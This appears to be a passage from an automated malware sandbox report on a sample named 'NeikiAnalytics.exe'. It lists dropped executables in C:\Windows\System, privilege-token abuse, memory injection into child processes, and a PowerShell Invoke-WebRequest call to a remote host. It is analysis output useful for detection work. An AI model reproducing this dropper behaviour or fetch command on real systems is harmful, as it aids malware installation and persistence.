File created C:\Windows\System\HLHkxhr.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\WkipXMl.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\NWOYoUs.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\QUvUfPM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\VfxVhEO.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\rIMwWgE.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\bCcmnhN.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\lHJLXfT.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\pdwzeVG.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\tghPIHX.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\jZGhDXD.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\KGIQQoq.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\XDYcvsJ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\YNCJEnm.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\AdzcPqq.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\tArmHYk.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\qWRWoPd.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\QXsWejh.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\tnfZjKl.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\JvcHlNK.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\lIdYgYA.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\FzZwgsy.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\BHrKFnG.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\GahjSHn.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\hZbFCdx.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\xRMRgpw.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\RQxLYJe.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\cDzDBIX.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\WLIIURd.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAGXduP.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\VJgYLGJ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\WeBGwVO.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\aaTjOVJ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\ElQtutO.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\IbmqqGg.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\MhKKWck.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\Huqhdgj.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\isVTpac.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\unofywZ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\jbRWxLL.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\WCFqDvF.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\zDvPFSZ.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\uLsPuAo.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\FBfYhIj.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\hJnvnCS.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\POguXSI.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\AKzOFxt.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\oilzCTt.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\eMHAsZY.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZXTTGWq.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\DrRacPE.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\iwLHAvM.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\tbgqjXl.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\aTOYlIx.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\oETPkLi.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1296 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1296 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1296 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LlqKjMW.exe
PID 1296 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LlqKjMW.exe
PID 1296 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\xpSnzVh.exe
PID 1296 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\xpSnzVh.exe
PID 1296 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\YxfdizT.exe
PID 1296 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\YxfdizT.exe
PID 1296 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\mAPeyGv.exe
PID 1296 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\mAPeyGv.exe
PID 1296 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\CqmuYOt.exe
PID 1296 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\CqmuYOt.exe
PID 1296 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTUQqJJ.exe
PID 1296 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTUQqJJ.exe
PID 1296 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jIpWIOQ.exe
PID 1296 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jIpWIOQ.exe
PID 1296 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\OWshedB.exe
PID 1296 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\OWshedB.exe
PID 1296 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aRdLAWV.exe
PID 1296 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aRdLAWV.exe
PID 1296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\lPinlgR.exe
PID 1296 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\lPinlgR.exe
PID 1296 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\woimUer.exe
PID 1296 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\woimUer.exe
PID 1296 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\kUGFVWr.exe
PID 1296 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\kUGFVWr.exe
PID 1296 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\KkKcEWF.exe
PID 1296 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\KkKcEWF.exe
PID 1296 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\eebjxNd.exe
PID 1296 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\eebjxNd.exe
PID 1296 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\gyBVRSz.exe
PID 1296 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\gyBVRSz.exe
PID 1296 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\TyAHvvX.exe
PID 1296 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\TyAHvvX.exe
PID 1296 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bChjwQt.exe
PID 1296 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bChjwQt.exe
PID 1296 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\HKvGVLD.exe
PID 1296 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\HKvGVLD.exe
PID 1296 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\uVlSmoO.exe
PID 1296 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\uVlSmoO.exe
PID 1296 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\dPtXNjH.exe
PID 1296 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\dPtXNjH.exe
PID 1296 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\NRzpmRj.exe
PID 1296 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\NRzpmRj.exe
PID 1296 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LeHznzc.exe
PID 1296 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\LeHznzc.exe
PID 1296 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\IbmqqGg.exe
PID 1296 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\IbmqqGg.exe
PID 1296 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\yZSIjxK.exe
PID 1296 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\yZSIjxK.exe
PID 1296 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aZDDHpW.exe
PID 1296 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aZDDHpW.exe
PID 1296 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTNuzuT.exe
PID 1296 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTNuzuT.exe
PID 1296 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bpXpuCF.exe
PID 1296 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bpXpuCF.exe
PID 1296 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\FtVNBcy.exe
PID 1296 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\FtVNBcy.exe
PID 1296 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jhmPsGZ.exe
PID 1296 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jhmPsGZ.exe
PID 1296 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\IKmGIZw.exe
PID 1296 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\IKmGIZw.exe
PID 1296 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\QspGHFu.exe
PID 1296 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\QspGHFu.exe

Processes

C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\LlqKjMW.exe

C:\Windows\System\LlqKjMW.exe

C:\Windows\System\xpSnzVh.exe

C:\Windows\System\xpSnzVh.exe

C:\Windows\System\YxfdizT.exe

C:\Windows\System\YxfdizT.exe

C:\Windows\System\mAPeyGv.exe

C:\Windows\System\mAPeyGv.exe

C:\Windows\System\CqmuYOt.exe

C:\Windows\System\CqmuYOt.exe

C:\Windows\System\BTUQqJJ.exe

C:\Windows\System\BTUQqJJ.exe

C:\Windows\System\jIpWIOQ.exe

C:\Windows\System\jIpWIOQ.exe

C:\Windows\System\OWshedB.exe

C:\Windows\System\OWshedB.exe

C:\Windows\System\aRdLAWV.exe

C:\Windows\System\aRdLAWV.exe

C:\Windows\System\lPinlgR.exe

C:\Windows\System\lPinlgR.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4180 /prefetch:8

C:\Windows\System\woimUer.exe

C:\Windows\System\woimUer.exe

C:\Windows\System\kUGFVWr.exe

C:\Windows\System\kUGFVWr.exe

C:\Windows\System\KkKcEWF.exe

C:\Windows\System\KkKcEWF.exe

C:\Windows\System\eebjxNd.exe

C:\Windows\System\eebjxNd.exe

C:\Windows\System\gyBVRSz.exe

C:\Windows\System\gyBVRSz.exe

C:\Windows\System\TyAHvvX.exe

C:\Windows\System\TyAHvvX.exe

C:\Windows\System\bChjwQt.exe

C:\Windows\System\bChjwQt.exe

C:\Windows\System\HKvGVLD.exe

C:\Windows\System\HKvGVLD.exe

C:\Windows\System\uVlSmoO.exe

C:\Windows\System\uVlSmoO.exe

C:\Windows\System\dPtXNjH.exe

C:\Windows\System\dPtXNjH.exe

C:\Windows\System\NRzpmRj.exe

C:\Windows\System\NRzpmRj.exe

C:\Windows\System\LeHznzc.exe

C:\Windows\System\LeHznzc.exe

C:\Windows\System\IbmqqGg.exe

C:\Windows\System\IbmqqGg.exe

C:\Windows\System\yZSIjxK.exe

C:\Windows\System\yZSIjxK.exe

C:\Windows\System\aZDDHpW.exe

C:\Windows\System\aZDDHpW.exe

C:\Windows\System\BTNuzuT.exe

C:\Windows\System\BTNuzuT.exe

C:\Windows\System\bpXpuCF.exe

C:\Windows\System\bpXpuCF.exe

C:\Windows\System\FtVNBcy.exe

C:\Windows\System\FtVNBcy.exe

C:\Windows\System\jhmPsGZ.exe

C:\Windows\System\jhmPsGZ.exe

C:\Windows\System\IKmGIZw.exe

C:\Windows\System\IKmGIZw.exe

C:\Windows\System\QspGHFu.exe

C:\Windows\System\QspGHFu.exe

C:\Windows\System\DZFQdqC.exe

C:\Windows\System\DZFQdqC.exe

C:\Windows\System\MVDnatk.exe

C:\Windows\System\MVDnatk.exe

C:\Windows\System\aIQIMQW.exe

C:\Windows\System\aIQIMQW.exe

C:\Windows\System\gMutRvB.exe

C:\Windows\System\gMutRvB.exe

C:\Windows\System\gWBuYba.exe

C:\Windows\System\gWBuYba.exe

C:\Windows\System\AfwsfgN.exe

C:\Windows\System\AfwsfgN.exe

C:\Windows\System\MVowJMC.exe

C:\Windows\System\MVowJMC.exe

C:\Windows\System\ALsarBM.exe

C:\Windows\System\ALsarBM.exe

C:\Windows\System\YcuCBJw.exe

C:\Windows\System\YcuCBJw.exe

C:\Windows\System\RDbxMZD.exe

C:\Windows\System\RDbxMZD.exe

C:\Windows\System\nUoeDXI.exe

C:\Windows\System\nUoeDXI.exe

C:\Windows\System\PeGyTTM.exe

C:\Windows\System\PeGyTTM.exe

C:\Windows\System\SoNjOeE.exe

C:\Windows\System\SoNjOeE.exe

C:\Windows\System\qvQaBAe.exe

C:\Windows\System\qvQaBAe.exe

C:\Windows\System\HsPutQG.exe

C:\Windows\System\HsPutQG.exe

C:\Windows\System\hZbFCdx.exe

C:\Windows\System\hZbFCdx.exe

C:\Windows\System\lDLgnkO.exe

C:\Windows\System\lDLgnkO.exe

C:\Windows\System\aAgNunv.exe

C:\Windows\System\aAgNunv.exe

C:\Windows\System\fnCnHQN.exe

C:\Windows\System\fnCnHQN.exe

C:\Windows\System\WImwSLW.exe

C:\Windows\System\WImwSLW.exe

C:\Windows\System\WkipXMl.exe

C:\Windows\System\WkipXMl.exe

C:\Windows\System\llWLZvv.exe

C:\Windows\System\llWLZvv.exe

C:\Windows\System\MWFIuEm.exe

C:\Windows\System\MWFIuEm.exe

C:\Windows\System\AKzOFxt.exe

C:\Windows\System\AKzOFxt.exe

C:\Windows\System\qNVRbEu.exe

C:\Windows\System\qNVRbEu.exe

C:\Windows\System\NWOYoUs.exe

C:\Windows\System\NWOYoUs.exe

C:\Windows\System\wrIyQAx.exe

C:\Windows\System\wrIyQAx.exe

C:\Windows\System\cBXiPFt.exe

C:\Windows\System\cBXiPFt.exe

C:\Windows\System\zgBezij.exe

C:\Windows\System\zgBezij.exe

C:\Windows\System\FPppyfT.exe

C:\Windows\System\FPppyfT.exe

C:\Windows\System\PMtVLsP.exe

C:\Windows\System\PMtVLsP.exe

C:\Windows\System\cJVLsyx.exe

C:\Windows\System\cJVLsyx.exe

C:\Windows\System\oilzCTt.exe

C:\Windows\System\oilzCTt.exe

C:\Windows\System\dFhAQPB.exe

C:\Windows\System\dFhAQPB.exe

C:\Windows\System\mEqiepl.exe

C:\Windows\System\mEqiepl.exe

C:\Windows\System\LqcjFtN.exe

C:\Windows\System\LqcjFtN.exe

C:\Windows\System\GVwqhmq.exe

C:\Windows\System\GVwqhmq.exe

C:\Windows\System\IExxHqq.exe

C:\Windows\System\IExxHqq.exe

C:\Windows\System\VwRIQsL.exe

C:\Windows\System\VwRIQsL.exe

C:\Windows\System\CNMuNTa.exe

C:\Windows\System\CNMuNTa.exe

C:\Windows\System\zhRxllw.exe

C:\Windows\System\zhRxllw.exe

C:\Windows\System\NDDBsLZ.exe

C:\Windows\System\NDDBsLZ.exe

C:\Windows\System\AnAvwWv.exe

C:\Windows\System\AnAvwWv.exe

C:\Windows\System\tANnSAq.exe

C:\Windows\System\tANnSAq.exe

C:\Windows\System\koxNByP.exe

C:\Windows\System\koxNByP.exe

C:\Windows\System\EUNtkoe.exe

C:\Windows\System\EUNtkoe.exe

C:\Windows\System\KgmyEtE.exe

C:\Windows\System\KgmyEtE.exe

C:\Windows\System\WiEuxrN.exe

C:\Windows\System\WiEuxrN.exe

C:\Windows\System\XDYcvsJ.exe

C:\Windows\System\XDYcvsJ.exe

C:\Windows\System\TEKOxOQ.exe

C:\Windows\System\TEKOxOQ.exe

C:\Windows\System\cnbDMVD.exe

C:\Windows\System\cnbDMVD.exe

C:\Windows\System\XvdgOnu.exe

C:\Windows\System\XvdgOnu.exe

C:\Windows\System\tIyGfQN.exe

C:\Windows\System\tIyGfQN.exe

C:\Windows\System\ygtQLbK.exe

C:\Windows\System\ygtQLbK.exe

C:\Windows\System\BtyACMf.exe

C:\Windows\System\BtyACMf.exe

C:\Windows\System\PPfEcLL.exe

C:\Windows\System\PPfEcLL.exe

C:\Windows\System\rrryVEE.exe

C:\Windows\System\rrryVEE.exe

C:\Windows\System\IuQDHiU.exe

C:\Windows\System\IuQDHiU.exe

C:\Windows\System\pHxBCXZ.exe

C:\Windows\System\pHxBCXZ.exe

C:\Windows\System\FIEdHMw.exe

C:\Windows\System\FIEdHMw.exe

C:\Windows\System\QUvUfPM.exe

C:\Windows\System\QUvUfPM.exe

C:\Windows\System\ZgaxPsx.exe

C:\Windows\System\ZgaxPsx.exe

C:\Windows\System\zeQrMMd.exe

C:\Windows\System\zeQrMMd.exe

C:\Windows\System\wCPZUEo.exe

C:\Windows\System\wCPZUEo.exe

C:\Windows\System\HEkWvWW.exe

C:\Windows\System\HEkWvWW.exe

C:\Windows\System\QXsWejh.exe

C:\Windows\System\QXsWejh.exe

C:\Windows\System\OBzQHXH.exe

C:\Windows\System\OBzQHXH.exe

C:\Windows\System\eMHAsZY.exe

C:\Windows\System\eMHAsZY.exe

C:\Windows\System\yJgfyeZ.exe

C:\Windows\System\yJgfyeZ.exe

C:\Windows\System\SOVtvFZ.exe

C:\Windows\System\SOVtvFZ.exe

